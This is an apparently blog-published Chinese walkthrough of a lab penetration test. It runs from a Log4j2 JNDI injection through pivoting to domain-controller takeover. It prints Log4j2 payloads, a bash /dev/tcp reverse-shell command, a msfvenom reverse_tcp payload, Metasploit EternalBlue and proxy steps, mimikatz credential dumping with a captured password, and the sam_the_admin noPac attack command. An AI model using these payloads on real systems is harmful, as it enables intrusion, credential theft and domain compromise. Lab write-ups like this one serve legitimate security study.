記一次log4j2引發(fā)的滲透測試

前言

記一次log4j2打入內(nèi)網(wǎng)并用CVE-2021-42287绘雁、CVE-2021-42278獲取到DC權限的靶場滲透铝噩。

外網(wǎng)打點

首先對web進行端口掃描,發(fā)現(xiàn)38080端口和22端口

訪問一下38080端口發(fā)現(xiàn)是一個error page

用Wappalyzer看一下是什么架構(gòu)鳖目,但是好像沒有檢測出來

image

拿著報錯去百度上發(fā)現(xiàn)應該是springboot

image

索性用goby再去掃一下仪媒,應該是spring沒錯狸眼,但是沒有漏洞是什么操作藤树?聯(lián)想到最近出的log4j2的洞,可能他只是一個日志文件所以并沒有框架

image
image

使用payload=${jndi:ldap://p9j8l8.dnslog.cn}驗證一下有回顯證明存在漏洞

image

嘗試進一步利用漏洞拓萌,首先起一個ldap服務岁钓,ip為本地接收shell的ip地址

<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 192.168.1.105</pre>

image

抓包修改Content-Type: appllication/x-www-form-urlencoded,并執(zhí)行以下payload成功回顯

<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">payload=${jndi:ldap://192.168.1.105:1389/TomcatBypass/TomcatEcho}</pre>

image

執(zhí)行ls -al /看一下也成功

image

nc開啟監(jiān)聽端口

image

然后使用bash命令反彈,這里需要先base64編碼然后對編碼后的特殊字符進行2層url轉(zhuǎn)碼

<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">bash -i >& /dev/tcp/192.168.1.105/9999 0>&1</pre>

抓包添加payload=${jndi:ldap:1/192.168.1.105:1389/TomcatBypass/Command/Base64/二層轉(zhuǎn)碼之后的字符}屡限,即可得到反彈shell

image

進行信息搜集發(fā)現(xiàn)為docker環(huán)境品嚣,這里嘗試了docker逃逸失敗,那么繼續(xù)進行信息搜集

image

在根目錄下找到了第一個flag钧大,這里有一個got this翰撑,在之前端口掃描的時候看到開放了22端口,嘗試使用ssh直接連接

image

使用xshell嘗試連接

image

連接成功啊央,拿到了宿主機的權限

image

ifconfig查看網(wǎng)卡情況發(fā)現(xiàn)還有一張10.0.1.0/24段的網(wǎng)卡

image

這里方便的話其實可以使用cs上線linux后用cs繼續(xù)打眶诈,這里我就沒有上線cs,使用linux的命令對10.0.1.0/24段探測存貨主機

<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"> for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 i &>/dev/null; then echoi Find the target; fi; done</pre>

image

ping一下是存活的

image

使用毒液把流量代理出來瓜饥,首先開啟監(jiān)聽

<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">admin.exe -lport 7777</pre>

image

然后上傳agent_linux到靶機上

image

加權并執(zhí)行

<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">chmod 777 agent_linux_x86
agent_linux_x86 -rhost 192.168.1.105 -rport 7777</pre>

image

連接成功

image

這里本來準備用毒液的代理到msf打的册养,后面覺得比較麻煩,就直接用kali生成的elf馬上線msf了

image

首先生成一個32位的elf馬

<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf</pre>

image

然后加權并執(zhí)行

<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">chmod 777 shell.elf

./shell</pre>

image

kali使用exploit/multi/handler進行監(jiān)聽

image

獲取到宿主機的shell

image

然后添加10.0.1.0/24段的路由

<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">bg

route add 10.0.1.0 255.255.255.0 1
route print</pre>

image

然后配置proxychain4.conf文件并使用socks模塊

<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">search socks
use auxiliary/sevrer/socks_proxy
run</pre>

image

我們在之前已經(jīng)知道了內(nèi)網(wǎng)主機的ip压固,那么這里我們直接使用proxychain配合nmap對10.0.1.7的端口進行掃描

<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">proxychains4 nmap -sT -Pn 10.0.1.7</pre>

image

發(fā)現(xiàn)有445端口,那么對445端口進一步掃描

image

先確定一下系統(tǒng)版本靠闭,使用auxiliary/scanner/smb/smb_version模塊帐我,發(fā)現(xiàn)是win7 sp1

image

看能不能利用永恒之藍,這里使用到auxiliary/scanner/smb/smb_ms17_010模塊愧膀,發(fā)現(xiàn)可以利用永恒之藍

image

使用exploit/windows/smb/ms17_010_eternalbule模塊拦键,因為是不出網(wǎng)環(huán)境,這里需要用到bind_tcp載荷

image

run之后拿到一個system權限的meterpreter

image

C:\Users\root\Desktop下拿到第二個flag

image

然后繼續(xù)進行信息搜集檩淋,發(fā)現(xiàn)同樣是雙網(wǎng)卡芬为,還存在10.0.0.0/24段的一張網(wǎng)卡

image

ipconfig /all看到dns服務器為redteam.lab應該在域內(nèi)

image

這里ping一下redteam.lab得到域控的ip為10.0.0.12

image

這里不知道域控有什么洞,先上傳一個mimikatz把密碼抓取出來蟀悦,得到Administrator/Admin12345媚朦,這里其實就可以使用域管賬戶ipc直接連接,但是這里抓到了一個域用戶日戈,嘗試使用最新的CVE-2021-42287询张、CVE-2021-42278來進行攻擊,關于漏洞的原理請移步

<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">privilege::debug
sekurlsa::logonpasswords</pre>

image
image

這里我準備使用noPac.exe直接去獲取一個shell的浙炼,但是這里noPac.exe的利用條件是需要主機上有.net4.0環(huán)境份氧,所以這里沒有回顯

noPac.exe下載地址:https://github.com/cube0x0/noPac

image

本來準備一步一步的用原始的方法打的,但是powershell用不了沒有回顯弯屈,就寫一下原始利用的步驟吧

  1. 首先創(chuàng)建一個機器賬戶蜗帜,可以使用 impacket 的 addcomputer.py或是powermad
`addcomputer.py`是利用`SAMR協(xié)議`創(chuàng)建機器賬戶,這個方法所創(chuàng)建的機器賬戶沒有SPN资厉,所以可以不用清除
  1. 清除機器賬戶的servicePrincipalName屬性
  1. 將機器賬戶的sAMAccountName厅缺,更改為DC的機器賬戶名字,注意后綴不帶$
  1. 為機器賬戶請求TGT
  1. 將機器賬戶的sAMAccountName更改為其他名字,不與步驟3重復即可
  1. 通過S4U2self協(xié)議向DC請求ST
  1. 進行 DCsync Attack
image

這里直接使用sam_the_admin.py進行攻擊

<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">proxychains python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell</pre>

image

即可拿到DC的shell

image

C:\Users\Administrator\Desktop下找到最后一個flag

image
?著作權歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末店归,一起剝皮案震驚了整個濱河市阎抒,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌消痛,老刑警劉巖且叁,帶你破解...
    沈念sama閱讀 211,639評論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異秩伞,居然都是意外死亡逞带,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,277評論 3 385
  • 文/潘曉璐 我一進店門纱新,熙熙樓的掌柜王于貴愁眉苦臉地迎上來展氓,“玉大人,你說我怎么就攤上這事脸爱∮龉” “怎么了?”我有些...
    開封第一講書人閱讀 157,221評論 0 348
  • 文/不壞的土叔 我叫張陵簿废,是天一觀的道長空入。 經(jīng)常有香客問我,道長族檬,這世上最難降的妖魔是什么歪赢? 我笑而不...
    開封第一講書人閱讀 56,474評論 1 283
  • 正文 為了忘掉前任,我火速辦了婚禮单料,結(jié)果婚禮上埋凯,老公的妹妹穿的比我還像新娘。我一直安慰自己扫尖,他們只是感情好白对,可當我...
    茶點故事閱讀 65,570評論 6 386
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著换怖,像睡著了一般躏结。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上狰域,一...
    開封第一講書人閱讀 49,816評論 1 290
  • 那天媳拴,我揣著相機與錄音,去河邊找鬼兆览。 笑死屈溉,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的抬探。 我是一名探鬼主播子巾,決...
    沈念sama閱讀 38,957評論 3 408
  • 文/蒼蘭香墨 我猛地睜開眼帆赢,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了线梗?” 一聲冷哼從身側(cè)響起椰于,我...
    開封第一講書人閱讀 37,718評論 0 266
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎仪搔,沒想到半個月后瘾婿,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 44,176評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡烤咧,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,511評論 2 327
  • 正文 我和宋清朗相戀三年偏陪,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片煮嫌。...
    茶點故事閱讀 38,646評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡笛谦,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出昌阿,到底是詐尸還是另有隱情饥脑,我是刑警寧澤,帶...
    沈念sama閱讀 34,322評論 4 330
  • 正文 年R本政府宣布懦冰,位于F島的核電站好啰,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏儿奶。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 39,934評論 3 313
  • 文/蒙蒙 一鳄抒、第九天 我趴在偏房一處隱蔽的房頂上張望闯捎。 院中可真熱鬧,春花似錦许溅、人聲如沸瓤鼻。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,755評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽茬祷。三九已至,卻和暖如春并蝗,著一層夾襖步出監(jiān)牢的瞬間祭犯,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,987評論 1 266
  • 我被黑心中介騙來泰國打工滚停, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留沃粗,地道東北人。 一個月前我還...
    沈念sama閱讀 46,358評論 2 360
  • 正文 我出身青樓键畴,卻偏偏與公主長得像最盅,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 43,514評論 2 348

推薦閱讀更多精彩內(nèi)容